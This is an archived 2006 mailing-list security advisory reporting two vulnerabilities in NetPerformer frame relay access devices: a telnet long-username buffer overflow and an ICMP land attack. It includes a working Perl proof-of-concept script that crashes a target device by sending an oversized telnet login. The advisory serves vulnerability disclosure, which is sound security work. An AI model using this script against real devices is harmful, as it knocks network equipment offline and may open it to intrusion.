lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Wed, 13 Sep 2006 17:13:36 +0700
From: arif.jatmoko@....ccamatil.com
To: bugtraq@...urityfocus.com, vulnwatch@...nwatch.org,
	full-disclosure@...ts.grok.org.uk
Subject: NetPerformer FRAD ACT Multiple Vulnerabilities



NetPerformer Frame Relay Access Device (FRAD) ACT Multiple Vulnerabilities

                        .<=[ Arif Jatmoko ]=>.

Release Date : 8 July 2006

Product Affected :

   - NetPerformer FRAD ACT SDM-95xx version 7.xx (R1), earlier, and
possibly newer
   - NetPerformer FRAD ACT SDM-93xx version 10.x.x (R2), earlier, and
possibly newer
   - NetPerformer FRAD ACT SDM-92xx version 9.x.x (R1), earlier, and
possibly  newer
   - ....


Web Site :
   www.netperformer.com


=.[DESCRIPTION].=

NetPerformer Frame Relay Access Device (FRAD) is switching & routing device
that support Ethernet and SNA protocols, Voice, etc. This device mainly
used for connecting distributed WAN network through frame relay or ATM
network.



=.[DETAILS].=

1. Telnet long username Buffer Overflow.
Passing an overly long username (>4550 char) against telnet service causes
device to reboot. Successful remote exploitation will possibly allows an
attacker gaining access into the device.


==================================
00.^.00==================================
# __START_CODE
#
#!/usr/bin/perl

use IO::Socket;
use strict;

my($socket) = "";

if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],

PeerPort => "23",

Proto    => "TCP"))
{
                 print "Modhiar'000 ..... killing netperformer ... $ARGV[0]
port 23...";
                 sleep(1);
                 print $socket "LOGIN " . "A" x 4550 . "BCDE\r\n";
                 sleep(1);
                 print $socket "PASS " . "\r\n";
                 close($socket);
}
else
{
                 print "Cannot connect to $ARGV[0]:23\n";
}
# __END_CODE

==================================
00.^.00==================================

2. ICMP Land Attack
By sending specially crafted ICMP packets will causes the device to be hang
up and resetting current TCP handshake connection. In earlier version
possibly will make device to reboot.


WORKAROUND

No Workaround yet for this vulnerability.

Vendor Response Status :
Vendor response very slow since discovered the above vulnerabilities.



Arif Jatmoko //=.
Information System Security Officer
Coca-Cola Bottling Indonesia


_______________________________________________________________________________
Visit us at www.coca-colabottling.co.id

CAUTION: 
This message may contain privileged and confidential information intended only for the use of the addressee named above. If you are not the intended recipient of this message, you are hereby notified that any use, dissemination,distribution, or reproduction of this message is prohibited. If you have received this message in error, please notify Coca-Cola Bottling Indonesia immediately. Any views expressed in this message are those of the individual sender and may not necessarily reflect the views of Coca-Cola Bottling Indonesia.

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ